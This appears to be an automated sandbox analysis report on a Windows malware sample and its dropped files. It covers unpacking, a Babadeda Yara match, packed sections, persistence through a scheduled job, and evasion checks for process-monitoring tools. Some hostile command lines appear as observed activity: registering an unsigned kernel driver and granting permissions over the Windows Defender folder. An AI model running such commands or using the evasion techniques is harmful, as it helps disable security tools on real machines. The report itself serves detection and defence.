Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\takeown.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe	Section loaded: msasn1.dll

Source: C:\Users\user\Desktop\SUAosT64HD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SUAosT64HD.exe

Static file information: File size 2966016 > 1048576

Source: SUAosT64HD.exe

Static PE information: Raw size of hsmahktm is bigger than: 0x100000 < 0x2a2800

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: apple.exe, 0000000E.00000003.1923045915.00000000068E1000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000000E.00000003.1922478872.00000000060EE000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000000E.00000002.1929624688.00000000008F3000.00000002.00000001.01000000.0000000C.sdmp, apple.exe, 0000000E.00000000.1920430499.00000000008F3000.00000002.00000001.01000000.0000000C.sdmp, apple.exe.11.dr, apple[1].exe.11.dr, 39pazbF[1].exe.11.dr
Source:	Binary string: C:\Users\1231123\Desktop\DDriver\x64\Release\DDriver.pdb source: ssisd.sys.14.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Unpacked PE file: 1.2.SUAosT64HD.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.680000.0.unpack :EW;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.680000.0.unpack :EW;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Unpacked PE file: 4.2.3d9778a1ff.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 7.2.rapes.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 8.2.rapes.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 10.2.axplong.exe.680000.0.unpack :EW;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 11.2.rapes.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\22.exe	Unpacked PE file: 16.2.22.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\22.exe	Unpacked PE file: 19.2.22.exe.400000.0.unpack

Yara detected Babadeda

Source: Yara match	File source: 16.2.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.apple.exe.5b0bf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\22.exe, type: DROPPED

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

File is packed with WinRar

Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5528031

Jump to behavior

PE file contains an invalid checksum

Source: rapes.exe.4.dr	Static PE information: real checksum: 0x1df9c6 should be: 0x1e75e1
Source: 39pazbF.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x3e1dd5
Source: xZRvIQ5.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0xb1cec
Source: apple.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x52234
Source: axplong.exe.1.dr	Static PE information: real checksum: 0x2dcb84 should be: 0x2dd5bc
Source: Rm3cVPI[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x64e65
Source: xZRvIQ5[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0xb1cec
Source: Rm3cVPI.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x64e65
Source: 22.exe.14.dr	Static PE information: real checksum: 0x0 should be: 0x1e9f1
Source: Or1ARiR[1].exe.11.dr	Static PE information: real checksum: 0x1e0154 should be: 0x1df774
Source: 39pazbF[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x3e1dd5
Source: Or1ARiR.exe.11.dr	Static PE information: real checksum: 0x1e0154 should be: 0x1df774
Source: SUAosT64HD.exe	Static PE information: real checksum: 0x2dcb84 should be: 0x2dd5bc
Source: 3d9778a1ff.exe.2.dr	Static PE information: real checksum: 0x1df9c6 should be: 0x1e75e1
Source: random[1].exe.2.dr	Static PE information: real checksum: 0x1df9c6 should be: 0x1e75e1
Source: apple[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x52234

PE file contains sections with non-standard names

Source: SUAosT64HD.exe	Static PE information: section name:
Source: SUAosT64HD.exe	Static PE information: section name: .idata
Source: SUAosT64HD.exe	Static PE information: section name: hsmahktm
Source: SUAosT64HD.exe	Static PE information: section name: vyraapnb
Source: SUAosT64HD.exe	Static PE information: section name: .taggant
Source: axplong.exe.1.dr	Static PE information: section name:
Source: axplong.exe.1.dr	Static PE information: section name: .idata
Source: axplong.exe.1.dr	Static PE information: section name: hsmahktm
Source: axplong.exe.1.dr	Static PE information: section name: vyraapnb
Source: axplong.exe.1.dr	Static PE information: section name: .taggant
Source: random[1].exe.2.dr	Static PE information: section name:
Source: random[1].exe.2.dr	Static PE information: section name: .idata
Source: random[1].exe.2.dr	Static PE information: section name:
Source: random[1].exe.2.dr	Static PE information: section name: ldnixbmt
Source: random[1].exe.2.dr	Static PE information: section name: ltyxvgaa
Source: random[1].exe.2.dr	Static PE information: section name: .taggant
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name:
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: .idata
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name:
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: ldnixbmt
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: ltyxvgaa
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: .taggant
Source: rapes.exe.4.dr	Static PE information: section name:
Source: rapes.exe.4.dr	Static PE information: section name: .idata
Source: rapes.exe.4.dr	Static PE information: section name:
Source: rapes.exe.4.dr	Static PE information: section name: ldnixbmt
Source: rapes.exe.4.dr	Static PE information: section name: ltyxvgaa
Source: rapes.exe.4.dr	Static PE information: section name: .taggant
Source: 39pazbF[1].exe.11.dr	Static PE information: section name: .didat
Source: 39pazbF.exe.11.dr	Static PE information: section name: .didat
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name:
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: .rsrc
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: .idata
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name:
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: iphnbyse
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: sbgczugd
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: .taggant
Source: Or1ARiR.exe.11.dr	Static PE information: section name:
Source: Or1ARiR.exe.11.dr	Static PE information: section name: .rsrc
Source: Or1ARiR.exe.11.dr	Static PE information: section name: .idata
Source: Or1ARiR.exe.11.dr	Static PE information: section name:
Source: Or1ARiR.exe.11.dr	Static PE information: section name: iphnbyse
Source: Or1ARiR.exe.11.dr	Static PE information: section name: sbgczugd
Source: Or1ARiR.exe.11.dr	Static PE information: section name: .taggant
Source: xZRvIQ5[1].exe.11.dr	Static PE information: section name: .gxfg
Source: xZRvIQ5[1].exe.11.dr	Static PE information: section name: .retplne
Source: xZRvIQ5[1].exe.11.dr	Static PE information: section name: _RDATA
Source: xZRvIQ5[1].exe.11.dr	Static PE information: section name: .cSs
Source: apple[1].exe.11.dr	Static PE information: section name: .didat
Source: apple.exe.11.dr	Static PE information: section name: .didat
Source: xZRvIQ5.exe.11.dr	Static PE information: section name: .gxfg
Source: xZRvIQ5.exe.11.dr	Static PE information: section name: .retplne
Source: xZRvIQ5.exe.11.dr	Static PE information: section name: _RDATA
Source: xZRvIQ5.exe.11.dr	Static PE information: section name: .cSs
Source: 22.exe.14.dr	Static PE information: section name: .code

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004BD84C push ecx; ret	1_2_004BD85F
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004B122F pushad ; ret	1_2_004B1230
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004B0B3B push esp; retf 0000h	1_2_004B0B3C
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_0069D84C push ecx; ret	2_2_0069D85F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_0069DEF6 push ecx; ret	2_2_0069DF09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_0069D84C push ecx; ret	3_2_0069D85F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_0069D84C push ecx; ret	10_2_0069D85F

Source: SUAosT64HD.exe	Static PE information: section name: entropy: 7.985136812848815
Source: axplong.exe.1.dr	Static PE information: section name: entropy: 7.985136812848815
Source: random[1].exe.2.dr	Static PE information: section name: entropy: 7.975444772690215
Source: random[1].exe.2.dr	Static PE information: section name: ldnixbmt entropy: 7.954880826054424
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: entropy: 7.975444772690215
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: ldnixbmt entropy: 7.954880826054424
Source: rapes.exe.4.dr	Static PE information: section name: entropy: 7.975444772690215
Source: rapes.exe.4.dr	Static PE information: section name: ldnixbmt entropy: 7.954880826054424
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: entropy: 7.975318503956283
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: iphnbyse entropy: 7.953999153405441
Source: Or1ARiR.exe.11.dr	Static PE information: section name: entropy: 7.975318503956283
Source: Or1ARiR.exe.11.dr	Static PE information: section name: iphnbyse entropy: 7.953999153405441

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe

File created: C:\Users\user\AppData\Local\Temp\ssisd.sys

Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\apple[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Or1ARiR[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\xZRvIQ5[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	File created: C:\Users\user\AppData\Local\Temp\22.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SUAosT64HD.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	File created: C:\Users\user\AppData\Local\Temp\ssisd.sys	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Desktop\SUAosT64HD.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"

Uses cacls to modify the permissions of files

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t

Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
